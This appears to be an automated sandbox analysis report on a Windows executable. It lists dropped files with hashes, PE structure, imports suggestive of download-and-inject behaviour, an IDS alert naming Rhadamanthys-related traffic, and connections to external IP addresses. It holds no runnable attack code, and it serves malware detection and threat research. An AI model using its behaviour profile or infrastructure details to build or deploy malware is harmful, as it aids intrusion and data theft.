SHA-512:	5C35AC42E43B8D51C0BE0B0B87E32EEA651D6A493279A2D3F55971FBB38876F21265FFE4CC6AF1CD27E64569AFCAC8120847499FD9944F9DDE6A49C9C8FB7F93
Malicious:	false
Preview:	j.Z...].g.b..........&......7.'.(.....F..K}..:\..~"....l....Su'1V...iKC.z.......(.<.0y.G........K.{....3.S.......5..j..$.-.^.B..t\:....$...q..{.!.......$u......xEw...x..#Nd.<."....\|cz..l.a..........G.6...F..P.\...\...G.5{.A...3C.62..@.{o....$..y&A..'..n.Y.b..&Fx.m.?LI.../...%.....!.....e{..7....C..e..+.. dCb.zv.../..Y..#.>?3.H..\'?.@2.d/c..p..?.E..0d..@%y........#.d.4.<.M.y<..l.N..@\.......n..?.....c....F.....).B.\|...P.{.8@.......{.CxPH.%...<.].j\|........?h.`..G.g..[wC./\|=.X..b2......@..a...W.......E..,.u.LJ.t.4....Lt...]...7>...D...]..0....xP...4..D..".....e.].s.....4...m....S.@8.R..s.p...MIIv.'I2.U.W.......= ..C*...-.....2.(..z.L...@e].o/6..,v..`.o.Zk[.......1...2..D.X.....\.0..,........yQ...S.x..o.).N....b...i....6......m^6......lxd..}.......X..(X....h...._0...&P.1n....X$rsI.....a9. X.CM.]....l....[nI.\.(..&zX..7.l.B..Egg3....Q.......w.wV6s-...p..}....K..T.II..f:5..l.g.bR..L...i.A'..{.-'4:.m.x......D.#../>[.amk....JS....X?.h....

C:\Users\user\AppData\Local\Temp\Universe

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	64512
Entropy (8bit):	7.997187902407482
Encrypted:	true
SSDEEP:	1536:43DbdeLBZXSvoX39KSwHNCxRfFgR6sQoK1f8fhzItRCFIjg6T/KR:4TYZXSSytGSQ8frMRGR
MD5:	0B59FF434694C6CBA87A40F1AD767C99
SHA1:	9224B783BC87CC606588A3A60AD2A9115FD9F9A0
SHA-256:	EACE451165225CC5207C9037BB8999DC7EEF6A36F44DBA42EA1051AF2DB2CEA0
SHA-512:	50926E7FCE4C16BC5C08CE63C65AFB6968BC355426BB4381005D53424A23EBA6CADBE74833B153EC2C33EA44F409BEB10B7C1B4326A4FE8C516F5CC49C4D0E1F
Malicious:	false
Preview:	.......Zb%ME..]!<u'....m.v.9}.s.g.L0.6..2/..?.......s.....b.V......d.,X..;. r`.!$.#z..Sn+...SFr..'.a3..V.y.'_<....%..Z...L....9._..b@..f.\.%`..............................\..p3.I;&.Q..W...iBg._3.,<....M9r.J..{Z.~.lA...A.\|.........=.s'..X.....sTN...o2..nA.1..<>...b.....[.kB]..D.&J.....}.a...j....1...j-}.~.......o.49{.6G..@.t8.u.j..}..5.A...B.:.r...Y.`.........T.^...J....'v...&i.f...V..Q......iZ....R.\|...RC..)t.[.c$..i..Q...Y....Z..SA.@=.v.f.E......0..@a%b..G;.3J..f../s%..8.`h...8............s.LT...K.......V....@w.......+.I......B...).._D.::.5>.Z......}.b..v\.....p...o...P..}.W!.z.t.^..M..1Hx.K...?. c....N....n.}.....i..^.b.6...:....T.Y!..."D%k..T4..-..x.C2....c...4..N.o.ev.'.E..~K....s..2..................Y..d.m.E.N(...0..M3.H.u........:..A...7.I...V.X.n.....x.,.5d....\|L.H/.[Y....HF.y...h.....?s...Cu.G.%....R.~^....6n....!VF.$-;.i&&....].p....0x../n..8%.L...,.^v..d...f...IPI..>P.^.k.v.S....NJ.4..V...(....s..<~...e_.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2lbkoxig.fw0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5k11jcdr.ich.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_atbli2bw.kn4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brjp3q1p.54y.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpooqlrn.e1a.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_godzftjd.fhr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hdybg0dx.b0w.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lfp4noe0.rvt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lwdkeddr.3ma.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3qccely.z0c.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z04mbpzi.wfi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0f5ucn5.ptv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\downloaded_exe.exe

Download File

Process:	C:\Users\user\Desktop\main.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1301562
Entropy (8bit):	7.976745133720472
Encrypted:	false
SSDEEP:	24576:G7PY8tHUPuoV29lyOr7WEM6WosbFVOo33GyGs/7IzAIcUZ2kgXJic:ghtD4A7W6s7/nGyGqEz/cUZyXV
MD5:	22AEFDCE6474D0687748AB51F3DDE0D9
SHA1:	B55A23B4F4D94CB4DB1CCBD1C762E1132E9FBF28
SHA-256:	00F978E0084F97FEEA64023458B25795B3DBD2717CCC2483CF60F6AA712D0556
SHA-512:	13EE29C919B326394970B96B77A856F47C247DFD7372E26ACDFAF688E2D4322D4EB41CB66AC5CF5AF86F78C06525A7B7B468D6C21979D451377894813BAADED9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@.......................................@.................................@.......................R....9...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...............................@..@.reloc...............4..............@..B................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4224082956497295
Encrypted:	false
SSDEEP:	6144:QSvfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnNU0uhiTw:7vloTyW+EZMM6DFym03w
MD5:	717516A9278FCEFC51344AD53525D833
SHA1:	5D043CD7A0D23D197E63EA83FDE7A48AB5A3B4D0
SHA-256:	737E348F60DAAE6FAFE9731E152A3CD5FF56923C4D915D20D21FBCDE2348080E
SHA-512:	C9368DAEFD952634D5EDAAEC4CEB8C80317026FAE850677F30268C4E6D10C5DBB721D98B99199A540F49566ADFCBEEB2558E4AE696CCC3347EB462657A59C801
Malicious:	false
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..84.Q...............................................................................................................................................................................................................................................................................................................................................j/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	5.988695202854149
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	main.exe
File size:	2'857'365 bytes
MD5:	014c8105b6501591916dafee9a3344c6
SHA1:	399a4ee96abbd286f321215d5843facab804de7d
SHA256:	2d4c300ef566b5b93590ecc1be25a8bd8c14fbc2de0bf5032af67ca31be1e6ea
SHA512:	5bbd4649929582c54e98dcca42820e2b9906b1a8be8bf5b7497442a89d6cb3d07d30a9c861450dd6774a63e8d8628dd7aaac601a18c0efc4de144b0d44ef46ed
SSDEEP:	49152:hTOzOPPkFuwmlHMcRkBKDyneDqC6Q0LAb:hT1PkFuwmq+DqC6Q0LAb
TLSH:	E2D5F84369DB0DE5CED667B4A5D36335A774FD328B2A1F3B6A08C23129536C4AD1EB00
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....ag..........&....+.......................@.............................`......Uq,...`... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x140001410
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x67619BD1 [Tue Dec 17 15:42:09 2024 UTC]
TLS Callbacks:	0x4000ea60, 0x1, 0x4000ea40, 0x1, 0x4001d050, 0x1
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2fc28831d7da9e149b95fdb1d126ae10

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [000D4415h]
mov dword ptr [eax], 00000000h
call 00007FAD20FF643Fh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
jmp 00007FAD2100F7D0h
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007FAD20FF6699h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
push ebx
mov eax, 00002098h
call 00007FAD21004C49h
dec eax
sub esp, eax
dec eax
lea ebp, dword ptr [esp+00000080h]
dec eax
mov dword ptr [ebp+00002030h], ecx
dec eax
mov dword ptr [ebp+00002038h], edx
mov dword ptr [esp+20h], 00000000h
inc ecx
mov ecx, 00000000h
inc ecx
mov eax, 00000000h
mov edx, 00000001h
dec eax
lea eax, dword ptr [000CDB5Bh]
dec eax
mov ecx, eax
dec eax
mov eax, dword ptr [000FD4C9h]
call eax
dec eax
mov dword ptr [ebp+00002008h], eax
dec eax
cmp dword ptr [ebp+00002008h], 00000000h
jne 00007FAD20FF66F6h
dec eax
lea eax, dword ptr [ebp+00001FEEh]
dec eax
mov dword ptr [ebp+00001FF8h], eax
nop
nop
dec eax
lea edx, dword ptr [ebp+00001FEEh]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xfe000	0x1498	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x102000	0x4e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xe1000	0xb64c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x103000	0x15fc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xd4080	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xfe508	0x490	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xcafe0	0xcb000	b3bc7e23a3f037ebad4fbf0c065e7b81	False	0.36458734221059114	data	6.16782212194474	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xcc000	0x20e0	0x2200	3171d0ebdee40075b0835a5c180cb052	False	0.04090073529411765	data	0.538692955570714	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xcf000	0x115c0	0x11600	6b4516f0c249a38c494fa26b3fde8b7c	False	0.20398212679856115	data	4.975960605820742	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0xe1000	0xb64c	0xb800	d02ef89c32c70dd982604551f7747c0d	False	0.5154976222826086	data	5.9348830720884775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0xed000	0xfcc8	0xfe00	ab0ce7d081f7d893407a6d8c597a95be	False	0.19202140748031496	data	4.895949425653715	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0xfd000	0xcf0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xfe000	0x1498	0x1600	71f5fd1161859f9bc8e2b0e74d57ba57	False	0.30806107954545453	data	4.412890776105013	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x100000	0x68	0x200	a580771928390473313a26db296ef00f	False	0.076171875	data	0.3547794057867809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x101000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x102000	0x4e8	0x600	e4adc98b726a115ca2b30d1d5a96ad6d	False	0.3333333333333333	data	4.779198327091495	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x103000	0x15fc	0x1600	d881cbbaae42e5a96d5e56a902d42f80	False	0.4069602272727273	data	5.432946852185233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/4	0x105000	0xa30	0xc00	bd16c16949b7df1916392124be4b246c	False	0.1904296875	data	1.7219893753488682	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/19	0x106000	0x18fd3	0x19000	5c2ef9d8e5daf2787b3cb1bc10d40926	False	0.416240234375	data	5.808603671861135	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/31	0x11f000	0x4dd4	0x4e00	3cfbe84364ae0b36d9bff4633fb09150	False	0.2251101762820513	data	4.84552781966147	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/45	0x124000	0xb499	0xb600	9e8d5476ea7f9e17e6f30f1780b43bd7	False	0.5031550480769231	data	5.025396707648536	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/57	0x130000	0x1fe0	0x2000	ca017529831ab83455b0939183a88ffc	False	0.2808837890625	data	4.605692525787879	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/70	0x132000	0x3d2	0x400	14ef477196f4ba66a23cdec12676e5af	False	0.451171875	data	4.713819195319815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/81	0x133000	0x335f	0x3400	28c39c78c2598b1e80dde20022bc5145	False	0.107421875	data	4.923329796728514	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/97	0x137000	0xde7c	0xe000	590efa73a1d68b4eb34c298cfc0ef741	False	0.5066789899553571	data	5.9215435307604025	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/113	0x145000	0x68f	0x800	c363f977a5e38c6fa4ad99c67f6739fb	False	0.62353515625	data	5.27968362030407	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x102058	0x48f	XML 1.0 document, ASCII text			0.40102827763496146

Imports

DLL	Import
CRYPT32.dll	CryptStringToBinaryA
KERNEL32.dll	CloseHandle, CreateEventA, CreatePipe, CreateProcessA, CreateSemaphoreA, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, FormatMessageA, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetHandleInformation, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessAffinityMask, GetSystemTimeAsFileTime, GetTempPathA, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, IsProcessorFeaturePresent, LeaveCriticalSection, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReadFile, ReleaseSemaphore, ResetEvent, ResumeThread, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetEvent, SetLastError, SetProcessAffinityMask, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, Sleep, SuspendThread, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WideCharToMultiByte
msvcrt.dll	__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fdopen, _fileno, _fmode, _fstat64, _get_osfhandle, _initterm, _lseeki64, _read, _setjmp, _strdup, _vscprintf, _vsnprintf, _wfopen, _write, abort, atexit, calloc, exit, fclose, fflush, fopen, fprintf, fputc, fputs, free, fwrite, getenv, iswctype, localeconv, longjmp, malloc, mbstowcs, memchr, memcmp, memcpy, memmove, memset, printf, realloc, setlocale, setvbuf, signal, strchr, strcmp, strcoll, strerror, strftime, strlen, strncmp, strtoul, strxfrm, towlower, towupper, vfprintf, wcscoll, wcsftime, wcslen, wcsxfrm
SHELL32.dll	ShellExecuteA
WININET.dll	InternetCloseHandle, InternetOpenA, InternetOpenUrlA, InternetReadFile

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-19T09:29:57.294165+0100	2854802	ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert	1	5.35.36.120	7957	192.168.2.5	49811	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 09:29:21.296237946 CET	49726	443	192.168.2.5	185.199.220.71
Dec 19, 2024 09:29:21.296319008 CET	443	49726	185.199.220.71	192.168.2.5
Dec 19, 2024 09:29:21.296936989 CET	49726	443	192.168.2.5	185.199.220.71
Dec 19, 2024 09:29:21.311918974 CET	49726	443	192.168.2.5	185.199.220.71
Dec 19, 2024 09:29:21.311952114 CET	443	49726	185.199.220.71	192.168.2.5
Dec 19, 2024 09:29:22.678463936 CET	443	49726	185.199.220.71	192.168.2.5
Dec 19, 2024 09:29:22.678587914 CET	49726	443	192.168.2.5	185.199.220.71
Dec 19, 2024 09:29:23.188889980 CET	49726	443	192.168.2.5	185.199.220.71
Dec 19, 2024 09:29:23.188921928 CET	443	49726	185.199.220.71	192.168.2.5
Dec 19, 2024 09:29:23.189243078 CET	443	49726	185.199.220.71	192.168.2.5
Dec 19, 2024 09:29:23.189305067 CET	49726	443	192.168.2.5	185.199.220.71
Dec 19, 2024 09:29:23.191564083 CET	49726	443	192.168.2.5	185.199.220.71
